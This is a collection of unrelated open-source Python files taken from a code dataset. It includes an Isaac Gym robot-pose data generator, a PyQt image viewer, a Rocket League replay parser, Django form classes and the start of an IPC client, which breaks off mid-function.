robot_dof_properties = self.gym.get_asset_dof_properties(robot_asset)\n\n self.robot_dof_lower_limits = []\n self.robot_dof_upper_limits = []\n\n for i in range(num_robot_dofs):\n robot_dof_properties[\"driveMode\"][i] = gymapi.DOF_MODE_POS\n\n robot_dof_properties[\"stiffness\"][i] = robot_dof_stiffness[i]\n robot_dof_properties[\"damping\"][i] = robot_dof_damping[i]\n\n self.robot_dof_lower_limits.append(robot_dof_properties[\"lower\"][i])\n self.robot_dof_upper_limits.append(robot_dof_properties[\"upper\"][i])\n\n self.robot_dof_lower_limits = to_torch(self.robot_dof_lower_limits)\n self.robot_dof_upper_limits = to_torch(self.robot_dof_upper_limits)\n\n # placement of the robot, xyz and quaternions determining if the robot stands upright\n robot_start_pose = gymapi.Transform()\n robot_start_pose.p = gymapi.Vec3(0.0, 0.0, 0.0)\n robot_start_pose.r = gymapi.Quat(0.0, 0.0, 0.0, 0.707107)\n\n # create the environment\n print(\"Creating %d environments\" % self.num_envs)\n\n envs = []\n robots = []\n\n for i in range(self.num_envs):\n # create env\n env_ptr = self.gym.create_env(self.sim, lower, upper, num_per_row)\n envs.append(env_ptr)\n\n # spawn the robot in a fixed location\n robot_actor = self.gym.create_actor(\n env_ptr, robot_asset, robot_start_pose, \"robot\", i, 1\n )\n self.gym.set_actor_dof_properties(\n env_ptr, robot_actor, robot_dof_properties\n )\n robots.append(robot_actor)\n\n link_names = [f\"{self.task_name}_link_{j}\" for j in range(num_robot_dofs + 1)]\n link_names.append(f\"{self.task_name}_link_ee\")\n self.link_handles = []\n for i in link_names:\n globals()[i] = self.gym.find_actor_rigid_body_handle(\n env_ptr, robot_actor, i\n )\n self.link_handles.append(globals()[i])\n\n self.init_data()\n\n def init_data(self):\n # acquire the rigid body tensor, wrap the tensor, and\n rigid_body_tensor = self.gym.acquire_rigid_body_state_tensor(self.sim)\n self.rigid_body_states = gymtorch.wrap_tensor(rigid_body_tensor).view(\n self.num_envs, -1, 13\n )\n\n self.gym.refresh_rigid_body_state_tensor(self.sim)\n\n # acquire the refreshed end-effector values from tensors\n self.end_effector_pos = self.rigid_body_states[:, self.link_handles[-1]][:, 0:3]\n self.end_effector_rot = self.rigid_body_states[:, self.link_handles[-1]][:, 3:7]\n\n self.num_dofs = self.gym.get_sim_dof_count(self.sim) // self.num_envs\n self.robot_dof_pos_targets = torch.zeros(\n (self.num_envs, self.num_dofs), dtype=torch.float\n )\n\n def update_ee(self):\n # define the target and ensure it is within the kinematic constraints\n for i in range(self.num_dofs):\n self.robot_dof_pos_targets[:, i] = torch_rand_float(\n self.robot_dof_lower_limits[i],\n self.robot_dof_upper_limits[i],\n (self.num_envs, 1),\n device=self.device,\n ).squeeze()\n # print(robot_dof_pos_targets)\n # move the robot to the position\n self.gym.set_dof_position_target_tensor(\n self.sim, gymtorch.unwrap_tensor(self.robot_dof_pos_targets)\n )\n\n # try if this method moves the joints instantaneously\n # might need some velocity also according to file:///home/vrt/Downloads/RL_joint_generation/docs/api/python/gym_py.html?highlight=indexed#isaacgym.gymapi.Gym.set_dof_state_tensor\n # self.gym.set_dof_state_tensor(self.sim, gymtorch.unwrap_tensor(self.robot_dof_pos_targets))\n\n def get_ee_pose(self, loop_iter):\n # refresh the tensor data to acquire the pose of the end-effector\n self.gym.refresh_rigid_body_state_tensor(self.sim)\n self.end_effector_pose = self.rigid_body_states[:, self.link_handles[-1]][:, 0:7]\n # append this to the matrix that is to be written to the csv\n # print(self.end_effector_pose)\n\n self.storage = torch.cat([self.storage, self.end_effector_pose], dim=0)\n print(\n f\"Recording number {loop_iter} out of {self.args.num_samples} - Current length of vector: {len(self.storage)}\"\n )\n # print(f'Time: {timeit.default_timer() - self.start:.2f} seconds')\n # self.start = timeit.default_timer()\n\n def record(self):\n next_update_time = 1\n frame = 0\n\n for i in range(self.args.num_samples):\n # self.start = timeit.default_timer()\n self.storage = torch.zeros((1, 7), dtype=torch.float)\n\n # while not self.gym.query_viewer_has_closed(self.viewer):\n while len(self.storage) < 1000000:\n # check if we should update\n t = self.gym.get_sim_time(self.sim)\n\n if t >= next_update_time:\n self.update_ee()\n next_update_time += 4\n\n if t > 5:\n self.get_ee_pose(i)\n\n # step the physics\n self.gym.simulate(self.sim)\n self.gym.fetch_results(self.sim, True)\n\n # step rendering\n if not self.args.headless:\n self.gym.step_graphics(self.sim)\n self.gym.draw_viewer(self.viewer, self.sim, False)\n self.gym.sync_frame_time(self.sim)\n\n frame += 1\n\n data_cp = self.storage.cpu()\n data_np = data_cp.numpy()\n data_pd = pd.DataFrame(data_np[1:])\n data_pd.to_csv(\n f\"../curriculum_data/{self.task_name}_raw_data/data_{i}.csv\",\n index=False,\n header=False,\n )\n\n print(\"Done\")\n\n if not self.args.headless:\n self.gym.destroy_viewer(self.viewer)\n self.gym.destroy_sim(self.sim)\n\n def split(self):\n # implement something to collect all data_i.csv files into one\n path = f\"../curriculum_data/{self.task_name}_raw_data/\"\n all_files = glob.glob(os.path.join(path, \"*.csv\"))\n\n print(f'Path of all .csv files to be loaded:')\n print('\\n'.join(map(str, sorted(all_files, key = lambda x: int(x.split(\"/\")[-1].split(\"_\")[1].split(\".\")[0])))))\n\n df = pd.concat(\n (pd.read_csv(f, header=None, index_col=False) for f in all_files)\n )\n print(f\"Dataframe shape after loading all .csv files: {df.shape}\")\n\n df = df.to_numpy()\n\n # remove points that are on the boundary of the workspace\n raw_size = df.shape[0]\n point_tree = spatial.cKDTree(df[:, [0, 1, 2]])\n df_indices = point_tree.query_ball_point([0, 0, 0], self.workspace_size)\n df = pd.DataFrame(df[df_indices])\n print(f\"Number of out-of-range point discarded: {raw_size - df.shape[0]}\")\n\n # remove points that are too close to the ground\n raw_size = df.shape[0]\n df = df[df[2] >= 0.2]\n print(f'Number of point too close to the ground discarded: {raw_size - df.shape[0]}')\n\n df = df.to_numpy()\n\n # use nearest neighbourhood algorithm to separate curriculums\n point = [np.max(df[:, 0]) / 2, 0, np.max(df[:, 2]) / 2]\n for i, value in enumerate(self.curriculum_sizes):\n # create point tree of the first three columns of the dataframe\n point_tree = spatial.cKDTree(df[:, [0, 1, 2]])\n # obtains indices of the points within the neighborhood\n df_indices = point_tree.query_ball_point(point, value)\n # create a curriculum dataframe that contains only the points inside the specified radius\n curr = pd.DataFrame(df[df_indices])\n\n print(f\"Curriculum: {i} with {curr.shape} points\")\n curr.to_csv(\n f\"../curriculum_data/{self.task_name}_curriculums/curr_{i}.csv\",\n index=False,\n header=False,\n )\n\n\nif __name__ == \"__main__\":\n # configures the print options for numpy objects in the terminal\n set_np_formatting()\n # gets the command line arguments and parses them\n args = get_args()\n # manual overwrite because it only runs on the CPU and not GPU\n args.device = \"CPU\"\n # device used for pytorch to store tensors\n sim_device = \"cpu\"\n # grabs information from the two yaml files defining properties such as num_envs, physics engine, neural network properties\n cfg, cfg_train, logdir = load_cfg(args)\n # used for initializing the simulation parameters\n sim_params = parse_sim_params(args, cfg, cfg_train)\n # seed for random.seed, np.random.seed, and torch.manual_seed\n set_seed(cfg_train[\"seed\"])\n\n gen = GeneratePoses(\n args=args,\n cfg=cfg,\n sim_params=sim_params,\n physics_engine=args.physics_engine,\n device_type=args.device,\n device_id=args.device_id,\n headless=args.headless,\n )\n\n if gen.args.record:\n if not os.path.exists(f\"../curriculum_data/{gen.task_name}_raw_data/\"):\n os.makedirs(f\"../curriculum_data/{gen.task_name}_raw_data/\")\n gen.record()\n if gen.args.split:\n if not os.path.exists(f\"../curriculum_data/{gen.task_name}_curriculums/\"):\n os.makedirs(f\"../curriculum_data/{gen.task_name}_curriculums/\")\n gen.split()\n","sub_path":"python/rlgpu/tasks/generate_poses.py","file_name":"generate_poses.py","file_ext":"py","file_size_in_byte":14347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347857316","text":"import sys\nimport cv2\n\nfrom PyQt5.QtCore import QPoint\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QWidget\nfrom PyQt5.QtGui import QPainter, QImage\nfrom PyQt5.uic import loadUiType\n\nimport imutils\n\n\nGIAO_DIEN, _ = loadUiType('giao_dien_xem_anh.ui')\n\n\n# Image widget\nclass ImageWidget(QWidget):\n def __init__(self, parent=None):\n super(ImageWidget, self).__init__(parent)\n self.image = None\n\n def setImage(self, image):\n self.image = image\n self.setMinimumSize(image.size())\n self.update()\n\n def paintEvent(self, event):\n qp = QPainter()\n qp.begin(self)\n if self.image:\n qp.drawImage(QPoint(0, 0), self.image)\n qp.end()\n\n\nclass ChuongTrinhChinh(QMainWindow, GIAO_DIEN):\n '''\n Giao diện chương trình\n '''\n\n def __init__(self, parent=None):\n super(ChuongTrinhChinh, self).__init__(parent)\n QMainWindow.__init__(self)\n self.setupUi(self)\n self.khoi_tao_su_kien()\n self.khung_hinh_anh = ImageWidget(self)\n self.khung_hien_thi_anh.addWidget(self.khung_hinh_anh)\n\n def khoi_tao_su_kien(self):\n '''\n Khởi tạo các sự kiện\n '''\n self.gia_tri_nho_nhat.valueChanged.connect(self.hien_gia_tri_nho_nhat)\n self.gia_tri_lon_nhat.valueChanged.connect(self.hien_gia_tri_lon_nhat)\n\n def hien_gia_tri_nho_nhat(self, gia_tri):\n '''\n Hiện giá trị nhỏ nhất\n '''\n self.hien_thi_nho_nhat.setText(str(gia_tri))\n\n def hien_gia_tri_lon_nhat(self, gia_tri):\n '''\n Hiện giá trị lớn nhất\n '''\n self.hien_thi_lon_nhat.setText(str(gia_tri))\n\n def hien_thi_anh(self, hinh_anh, dinh_dang):\n '''\n Hiển thị hình ảnh\n '''\n if dinh_dang == 1:\n dinh_dang_anh = QImage.Format_Grayscale8\n du_lieu = hinh_anh.shape[1]\n else:\n dinh_dang_anh = QImage.Format_RGB888\n du_lieu = hinh_anh.shape[1] * 3\n\n q_hinh_anh = QImage(\n hinh_anh.data,\n hinh_anh.shape[1],\n hinh_anh.shape[0],\n du_lieu,\n dinh_dang_anh,\n )\n self.khung_hinh_anh.setImage(q_hinh_anh)\n\n def doc_anh(self, duong_dan):\n '''\n Đọc hình ảnh chỉ định\n '''\n hinh_anh = cv2.imread(duong_dan)\n\n # Chỉnh tỉ lệ hiển thị\n ti_le = hinh_anh.shape[0] / 1000.0\n anh_goc = hinh_anh.copy()\n hinh_anh = imutils.resize(hinh_anh, height=1000)\n\n # Chuyển sang ảnh đen trắng, làm mờ và tìm các cạnh\n den_trang = cv2.cvtColor(hinh_anh, cv2.COLOR_BGR2GRAY)\n den_trang = cv2.GaussianBlur(den_trang, (5, 5), 0)\n cac_canh = cv2.Canny(den_trang, 55, 200)\n self.hien_thi_anh(den_trang, 1)\n\n\nif __name__ == '__main__':\n chuong_trinh = QApplication([])\n cua_so = ChuongTrinhChinh()\n cua_so.show()\n cua_so.doc_anh(sys.argv[1])\n chuong_trinh.exec_()\n","sub_path":"phieu_trac_nghiem/test_xem_anh.py","file_name":"test_xem_anh.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104938915","text":"import json\nimport pickle\nimport traceback\nfrom pprint import pprint\n\nfrom boto.exception import S3ResponseError\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom pyrope import Replay\nfrom pyrope.exceptions import FrameParsingError\n\n\nclass Parser(object):\n\n def __init__(self, file_path, parse_netstream=False, obj=None):\n self.replay = Replay(file_path)\n self.replay_id = self.replay.header['Id']\n\n self.actor_metadata = {}\n self.goal_metadata = {}\n self.match_metadata = {}\n self.team_metadata = {}\n self.actors = {}\n self.cars = {}\n self.boost_data = {}\n self.heatmap_json_filename = None\n\n assert len(self.team_metadata) == 0\n\n pickle_filename = 'uploads/pickle_files/{}.pickle'.format(self.replay_id)\n heatmap_json_filename = 'uploads/replay_json_files/{}.json'.format(self.replay_id)\n location_json_filename = 'uploads/replay_location_json_files/{}.json'.format(self.replay_id)\n\n if parse_netstream:\n try:\n self.replay = pickle.loads(default_storage.open(pickle_filename).read())\n except (FileNotFoundError, OSError, S3ResponseError):\n try:\n self.replay.parse_netstream()\n default_storage.save(pickle_filename, ContentFile(pickle.dumps(self.replay)))\n except FrameParsingError:\n # Bail us out of here early, just provide an 'old school' parse.\n parse_netstream = False\n traceback.print_exc()\n\n if not parse_netstream:\n return\n\n self._get_actors()\n\n # If the number of goals in the header doesn't match the number of goals\n # in the game, try to get the missing goal data from the netstream.\n\n \"\"\"\n ('3e_Team1',\n {'actor_id': 3,\n 'actor_type': 'Archetypes.Teams.Team1',\n 'data': {'Engine.TeamInfo:Score': 1},\n 'new': False,\n 'startpos': 2053839}),\n \"\"\"\n if len(self.replay.header.get('Goals', [])) < self.replay.header.get('Team0Score', 0) + self.replay.header.get('Team1Score', 0):\n for index, frame in self.replay.netstream.items():\n for _, actor in frame.actors.items():\n if 'data' not in actor:\n continue\n\n if (\n 'Engine.TeamInfo:Score' in actor['data'] and\n 'TAGame.Team_TA:GameEvent' not in actor['data'] and\n actor['actor_type'].startswith('Archetypes.Teams.Team')\n ):\n if 'Goals' not in self.replay.header:\n self.replay.header['Goals'] = []\n\n self.replay.header['Goals'].append({\n 'PlayerName': 'Unknown player (own goal?)',\n 'PlayerTeam': actor['actor_type'].replace('Archetypes.Teams.Team', ''),\n 'frame': index\n })\n\n # Extract the goal information.\n if 'Goals' in self.replay.header:\n for goal in self.replay.header['Goals']:\n self._extract_goal_data(goal['frame'])\n\n if 'NumFrames' in self.replay.header:\n assert len(self.team_metadata) == 2\n\n for player in self.actors.copy():\n # Get their position data.\n if 'type' not in self.actors[player]:\n continue\n\n if self.actors[player]['type'] == 'player':\n self.actors[player]['position_data'] = self._get_player_position_data(player)\n elif self.actors[player]['type'] == 'ball':\n if 'ball' not in self.actors:\n self.actors['ball'] = {\n 'position_data': {}\n }\n\n ball_data = self._get_player_position_data(player)\n\n self.actors['ball']['position_data'] = {\n **self.actors['ball']['position_data'],\n **ball_data\n }\n\n del self.actors[player]\n\n # Compress the location data per (player) actor.\n compressed_data = {}\n\n for actor in self.actors:\n if 'type' not in self.actors[actor]:\n continue\n\n if self.actors[actor]['type'] == 'player':\n compressed_data[actor] = {}\n\n current_key = ''\n key = ''\n\n keys = self.actors[actor]['position_data'].keys()\n\n if len(keys) == 0:\n continue\n\n for frame in range(min(keys), max(keys)):\n if frame in self.actors[actor]['position_data']:\n data = self.actors[actor]['position_data'][frame]\n key = '{},{}'.format(data['x'], data['y'])\n\n if key == current_key:\n compressed_data[actor][key] += 1\n else:\n if key not in compressed_data[actor]:\n compressed_data[actor][key] = 1\n else:\n compressed_data[actor][key] += 1\n\n assert sum([i[1] for i in compressed_data[actor].items()]) == max(self.actors[actor]['position_data'], key=int) - min(self.actors[actor]['position_data'], key=int)\n\n if default_storage.exists(heatmap_json_filename):\n default_storage.delete(heatmap_json_filename)\n\n heatmap_json_filename = default_storage.save(heatmap_json_filename, ContentFile(json.dumps(compressed_data, separators=(',', ':'))))\n\n self.heatmap_json_filename = heatmap_json_filename\n\n if obj.eligble_for_feature('playback'):\n # Advanced replay parsing.\n # Restructure the data so that it's chunkable.\n frame_data = []\n\n for frame in range(self.replay.header['NumFrames']):\n frame_dict = {\n 'time': self.replay.netstream[frame].current,\n 'actors': []\n }\n\n for player in self.actors:\n position_data = self.actors[player]['position_data']\n\n if frame in position_data:\n frame_dict['actors'].append({\n 'id': player,\n 'type': self.actors[player].get('type', 'ball'),\n **position_data[frame]\n })\n\n frame_data.append(frame_dict)\n\n if default_storage.exists(location_json_filename):\n default_storage.delete(location_json_filename)\n\n self._get_boost_data()\n self._get_seconds_remaining()\n # pprint(self.boost_data)\n\n small_actors = {}\n\n for key, value in self.actors.items():\n small_actors[key] = value\n\n del small_actors[key]['position_data']\n\n final_data = {\n 'frame_data': frame_data,\n 'goals': self.replay.header.get('Goals', []),\n 'boost': self.boost_data,\n 'seconds_mapping': self.seconds_mapping,\n 'actors': self.actors,\n 'teams': self.team_metadata\n }\n\n location_json_filename = default_storage.save(location_json_filename, ContentFile(json.dumps(final_data, separators=(',', ':'))))\n self.location_json_filename = location_json_filename\n\n def _get_match_metadata(self, frame):\n # Search through the frames looking for some game replication info.\n game_info = [\n value for name, value in frame.actors.items()\n if (\n 'GameReplicationInfoArchetype' in name and\n 'Engine.GameReplicationInfo:ServerName' in value['data']\n )\n ]\n\n if not game_info:\n return\n\n game_info = game_info[0]['data']\n\n self.match_metadata = {\n 'server_name': game_info['Engine.GameReplicationInfo:ServerName'],\n 'playlist': game_info.get('ProjectX.GRI_X:ReplicatedGamePlaylist', 0)\n }\n\n def _get_team_metadata(self, frame):\n # Search through the frame looking for team info.\n team_info = [\n value for name, value in frame.actors.items()\n if 'Archetypes.Teams.Team' in value.get('actor_type', '') and value['new']\n ]\n\n if not team_info:\n return\n\n for team in team_info:\n self.team_metadata[team['actor_id']] = team['actor_type'].replace('Archetypes.Teams.Team', '')\n\n def _extract_goal_data(self, base_index, search_index=None):\n # If the player name is unique within the actor set, then don't bother\n # searching through frames for the data.\n for goal in self.replay.header['Goals']:\n if goal['frame'] == base_index:\n player = [\n actor_id\n for actor_id, data in self.actors.items()\n if data['type'] == 'player' and data['name'] == goal['PlayerName']\n ]\n\n if len(player) == 1:\n self.goal_metadata[base_index] = player[0]\n return\n\n # We found the goal we wanted, we just couldn't find the player,\n # but break out early as a minor optimisation.\n break\n\n if not search_index:\n search_index = base_index\n\n if base_index not in self.replay.netstream:\n search_index = base_index - 1\n\n frame = self.replay.netstream[search_index]\n\n scorer = None\n\n players = [\n value\n for name, value in frame.actors.items()\n if value['actor_type'] == 'TAGame.Default__PRI_TA'\n ]\n\n # Figure out who scored.\n for value in players:\n if 'TAGame.PRI_TA:MatchGoals' in value['data']:\n scorer = value['actor_id']\n break\n\n if 'TAGame.PRI_TA:MatchAssists' in value['data']:\n # print('we have the assister!', value['actor_id'])\n pass\n\n # Search in the closest frames, then gradually expand the search.\n\n if scorer is None:\n if search_index < base_index - 100:\n print('Unable to find goal for frame', base_index)\n return\n\n if search_index == base_index:\n next_index = base_index - 1\n elif search_index - base_index < 0:\n next_index = base_index + abs(search_index - base_index)\n elif search_index - base_index > 0:\n next_index = base_index + (search_index - base_index + 1) * -1\n\n if next_index not in self.replay.netstream:\n next_index = search_index - 1\n\n self._extract_goal_data(base_index, next_index)\n return\n\n # print('Found goal', search_index - base_index)\n self.goal_metadata[base_index] = scorer\n\n def _get_actors(self):\n for index, frame in self.replay.netstream.items():\n # We can attempt to get the match metadata during this loop and\n # save us having to loop the netstream more than once.\n if not self.match_metadata:\n self._get_match_metadata(frame)\n\n if len(self.team_metadata) < 2:\n self._get_team_metadata(frame)\n\n # Find the player actor objects.\n players = [\n value\n for name, value in frame.actors.items()\n if value['actor_type'] == 'TAGame.Default__PRI_TA'\n ]\n\n for value in players:\n \"\"\"\n Example `value`:\n\n {'actor_id': 2,\n 'actor_type': 'TAGame.Default__PRI_TA',\n 'data': {'Engine.PlayerReplicationInfo:Ping': 24,\n 'Engine.PlayerReplicationInfo:PlayerID': 656,\n 'Engine.PlayerReplicationInfo:PlayerName': \"AvD Sub'n\",\n 'Engine.PlayerReplicationInfo:Team': (True, 6),\n 'Engine.PlayerReplicationInfo:UniqueId': (1, 76561198040631598, 0),\n 'Engine.PlayerReplicationInfo:bReadyToPlay': True,\n 'TAGame.PRI_TA:CameraSettings': {'dist': 270.0,\n 'fov': 107.0,\n 'height': 110.0,\n 'pitch': -2.0,\n 'stiff': 1.0,\n 'swiv': 4.300000190734863},\n 'TAGame.PRI_TA:ClientLoadout': (11, [23, 0, 613, 39, 752, 0, 0]),\n 'TAGame.PRI_TA:ClientLoadoutOnline': (11, 0, 0),\n 'TAGame.PRI_TA:PartyLeader': (1, 76561198071203042, 0),\n 'TAGame.PRI_TA:ReplicatedGameEvent': (True, 1),\n 'TAGame.PRI_TA:Title': 0,\n 'TAGame.PRI_TA:TotalXP': 9341290,\n 'TAGame.PRI_TA:bUsingSecondaryCamera': True},\n 'new': False,\n 'startpos': 102988}\n \"\"\"\n\n if 'data' not in value:\n continue\n\n if 'Engine.PlayerReplicationInfo:bWaitingPlayer' in value['data']:\n continue\n\n team_id = None\n actor_id = value['actor_id']\n\n if 'Engine.PlayerReplicationInfo:Team' in value['data']:\n team_id = value['data']['Engine.PlayerReplicationInfo:Team'][1]\n\n if actor_id in self.actors:\n if team_id is not None:\n if self.actors[actor_id]['team'] != team_id:\n if actor_id in self.actor_metadata:\n self.actor_metadata[actor_id]['Engine.PlayerReplicationInfo:Team'] = value['data']['Engine.PlayerReplicationInfo:Team']\n\n if team_id != -1:\n self.actors[actor_id]['team'] = team_id\n\n if not self.actors[actor_id]['team'] or team_id == -1:\n # self.actors[actor_id]['team'] = team_id\n self.actors[actor_id]['left'] = index\n\n elif 'TAGame.PRI_TA:ClientLoadout' in value['data']:\n player_name = value['data']['Engine.PlayerReplicationInfo:PlayerName']\n\n self.actors[actor_id] = {\n 'type': 'player',\n 'join': index,\n 'left': self.replay.header['NumFrames'],\n 'name': player_name,\n 'team': team_id,\n }\n\n if actor_id not in self.actor_metadata:\n self.actor_metadata[actor_id] = value['data']\n\n # See if our current data value has any new fields.\n if actor_id not in self.actor_metadata:\n self.actor_metadata[actor_id] = value['data']\n else:\n for key, value in value['data'].items():\n if key not in self.actor_metadata[actor_id]:\n self.actor_metadata[actor_id][key] = value\n\n # Get the ball data (if any).\n ball = [\n value\n for name, value in frame.actors.items()\n if (\n value['actor_type'] == 'Archetypes.Ball.Ball_Default' and\n 'TAGame.RBActor_TA:ReplicatedRBState' in value.get('data', {})\n )\n ]\n\n if ball:\n # pprint(ball)\n ball = ball[0]\n\n if ball['actor_id'] not in self.actors and 'TAGame.RBActor_TA:ReplicatedRBState' in ball['data']:\n self.actors[ball['actor_id']] = {\n 'type': 'ball'\n }\n\n def _get_boost_data(self):\n # 'TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount'\n\n # Do we have a new car object? Assign it to the user.\n \"\"\"\n {'actor_id': 7,\n 'actor_type': 'Archetypes.Car.Car_Default',\n 'data': {'Engine.Pawn:PlayerReplicationInfo': (True, 4),\n 'TAGame.Car_TA:TeamPaint': {'CustomColorID': 90,\n 'CustomFinishID': 270,\n 'Team': 0,\n 'TeamColorID': 3,\n 'TeamFinishID': 270},\n 'TAGame.RBActor_TA:ReplicatedRBState': {'flag': False,\n 'pos': (0, -4608, 43),\n 'rot': (-1.000030518509476,\n -0.500015259254738,\n -1.000030518509476),\n 'vec1': (0, 0, -162),\n 'vec2': (0, 0, 0)},\n 'TAGame.Vehicle_TA:ReplicatedThrottle': 255},\n 'new': False,\n 'startpos': 4230}\n {'actor_id': 8,\n 'actor_type': 'Archetypes.CarComponents.CarComponent_Boost',\n 'data': {'TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount': 85,\n 'TAGame.CarComponent_TA:Vehicle': (True, 7)},\n 'new': False,\n 'startpos': 4537}\n \"\"\"\n\n self.boost_actors = {}\n self.cars = {}\n\n for index, frame in self.replay.netstream.items():\n # pprint(frame.actors.items())\n\n for name, value in frame.actors.items():\n actor_id = value['actor_id']\n\n # Get any cars.\n if value['actor_type'] == 'Archetypes.Car.Car_Default':\n if 'data' not in value:\n continue\n\n if 'Engine.Pawn:PlayerReplicationInfo' in value['data']:\n player_id = value['data']['Engine.Pawn:PlayerReplicationInfo'][1]\n self.cars[actor_id] = player_id\n\n # Get any boost objects.\n if value['actor_type'] == 'Archetypes.CarComponents.CarComponent_Boost':\n if actor_id not in self.boost_actors:\n self.boost_actors[actor_id] = {}\n\n if 'data' not in value:\n continue\n\n if 'TAGame.CarComponent_TA:Vehicle' in value['data']:\n car_id = value['data']['TAGame.CarComponent_TA:Vehicle'][1]\n self.boost_actors[actor_id] = car_id\n\n if 'TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount' in value['data']:\n if actor_id not in self.boost_data:\n self.boost_data[actor_id] = {}\n\n self.boost_data[actor_id][index] = value['data']['TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount']\n\n # Data structure:\n #\n # value key = booster id (in values)\n # booster id maps to a car (in actors)\n # cars map to players (in card)\n\n self.boost_data = {\n 'values': self.boost_data,\n 'actors': self.boost_actors,\n 'cars': self.cars,\n }\n\n def _get_seconds_remaining(self):\n self.seconds_mapping = {}\n\n for index, frame in self.replay.netstream.items():\n for name, value in frame.actors.items():\n if 'data' not in value:\n continue\n\n if 'TAGame.GameEvent_Soccar_TA:SecondsRemaining' in value['data']:\n self.seconds_mapping[index] = value['data']['TAGame.GameEvent_Soccar_TA:SecondsRemaining']\n\n def _get_player_position_data(self, player_id):\n player = self.actors[player_id]\n result = {}\n\n car_actor_obj = None\n\n # TODO: Refactor this to only loop the netstream once.\n if player['type'] == 'player':\n for index in range(player['join'], player['left']):\n try:\n frame = self.replay.netstream[index]\n except KeyError:\n # Handle truncated network data.\n break\n\n # First we need to find the player's car object.\n for actor in frame.actors:\n actor_obj = frame.actors[actor]\n\n if 'data' not in actor_obj:\n continue\n\n engine = actor_obj['data'].get('Engine.Pawn:PlayerReplicationInfo')\n\n # This is the correct object for this player.\n if engine and engine[1] == player_id:\n car_actor_obj = actor_obj['actor_id']\n\n # If the actor we're looking at is the car object, then get the\n # position and rotation data for this frame.\n if actor_obj['actor_id'] == car_actor_obj:\n state_data = actor_obj['data'].get('TAGame.RBActor_TA:ReplicatedRBState')\n\n if state_data:\n x, y, z = state_data['pos']\n yaw, pitch, roll = state_data['rot']\n\n result[index] = {\n 'x': x,\n 'y': y,\n 'z': z,\n 'pitch': pitch,\n 'roll': roll,\n 'yaw': yaw\n }\n\n elif player['type'] == 'ball':\n for index, frame in self.replay.netstream.items():\n # Does this actor exist in the frame data?\n for actor in frame.actors:\n actor_obj = frame.actors[actor]\n\n if 'data' not in actor_obj:\n continue\n\n if actor_obj['actor_id'] != player_id:\n continue\n\n if 'TAGame.RBActor_TA:ReplicatedRBState' not in actor_obj['data']:\n continue\n\n if actor_obj['actor_type'] != 'Archetypes.Ball.Ball_Default':\n continue\n\n state_data = actor_obj['data']['TAGame.RBActor_TA:ReplicatedRBState']\n\n x, y, z = state_data['pos']\n yaw, pitch, roll = state_data['rot']\n\n result[index] = {\n 'x': x,\n 'y': y,\n 'z': z,\n 'pitch': pitch,\n 'roll': roll,\n 'yaw': yaw\n }\n\n return result\n","sub_path":"rocket_league/apps/replays/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":23235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"109108607","text":"from django import forms\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.contrib.auth.models import User\n\nfrom .models import Article, Message, Social\n\n\nclass BaseForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass UserUpdateForm(BaseForm):\n\n class Meta:\n model = User\n fields = ['first_name', 'last_name', 'username', 'email', ]\n\n\nclass SignUpForm(UserCreationForm):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n \n class Meta:\n model = User\n fields = ['first_name', 'last_name', 'username', 'email', 'password1', 'password2', ]\n\n \nclass UserLoginForm(AuthenticationForm):\n \n def __init__(self, request, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass ArticleForm(BaseForm):\n\n class Meta:\n model = Article\n fields = ['title', 'details', 'footer', 'link', ]\n\n\nclass MessageForm(BaseForm):\n\n class Meta:\n model = Message\n fields = ['full_name', 'email', 'message', ]\n\n\nclass SocialForm(BaseForm):\n\n class Meta:\n model = Social\n fields = ['website', 'url', 'icon', ]\n","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532676580","text":"# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot, pyqtProperty\n\nimport threading, time\nimport os\nfrom utils.misc import tryRemove, trySymlink, tryMkdir\nfrom utils.system import getInitType, InitType\nimport constants\n\nfrom multiprocessing.connection import Client\n\n\nclass _XwaredCommunicationClient(object):\n funcName = None\n args = tuple()\n kwargs = dict()\n sent = False\n conn = None\n response = None\n received = False\n\n def __init__(self):\n self.conn = Client(*constants.XWARED_SOCKET)\n\n def send(self):\n if not self.funcName:\n raise ValueError(\"no funcName\")\n self.conn.send([self.funcName, self.args, self.kwargs])\n self.sent = True\n self.response = self.conn.recv()\n self.received = True\n self.conn.close()\n\n def setFunc(self, funcName):\n if self.sent:\n raise Exception(\"sent already.\")\n self.funcName = funcName\n\n def setArgs(self, args):\n if self.sent:\n raise Exception(\"sent already.\")\n self.args = args\n\n def setKwargs(self, kwargs):\n if self.sent:\n raise Exception(\"sent already.\")\n self.kwargs = kwargs\n\n def getReturnValue(self):\n if not self.sent:\n raise Exception(\"not sent yet.\")\n if not self.received:\n raise Exception(\"not received yet.\")\n return self.response\n\n\nclass InvalidSocket(FileNotFoundError, ConnectionRefusedError):\n pass\n\n\ndef callXwaredInterface(funcName, *args, **kwargs):\n try:\n client = _XwaredCommunicationClient()\n except (FileNotFoundError, ConnectionRefusedError) as e:\n logging.error(\"XwaredInterface InvalidSocket with method {}\".format(funcName))\n raise InvalidSocket(e)\n\n client.setFunc(funcName)\n if args:\n client.setArgs(args)\n if kwargs:\n 